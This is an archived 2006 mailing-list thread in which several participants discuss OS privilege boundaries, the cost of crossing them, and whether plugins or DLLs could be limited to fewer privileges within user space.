18 Aug
2006
18 Aug
'06
6:21 p.m.
Alexey Toptygin wrote:
On Fri, 18 Aug 2006, Chuck Guzis wrote:
Or, in a microkernel/multiserver environment, between any
two *services*/client/etc.
On 8/18/2006 at 3:17 PM Don wrote:
This is computationally expensive and complicated. Every time you have
to cross a privilege boundary you have to switch context, validate any
data going across and verify permissions. You also need an exact
specification of the interface for every such interface - if the system
doesn't know what your DLL is allowed to do, how can it stop it from
doing what it shouldn't? This is why this sort of pain is usually
reserved for the user-kernel interface. But, user applications can be developed using
tools that
fail to observe your conventions WITHIN their application.
I.e. it seems like the only mechanisms that you can put
in place are those that are invoked at protection boundaries.
(?)
Why are protections primarily reserved for OS-level tasks? Why not
subset
protections within the user area? A user should be able to say that a
plugin or DLL should have only a certain limited number of privledges.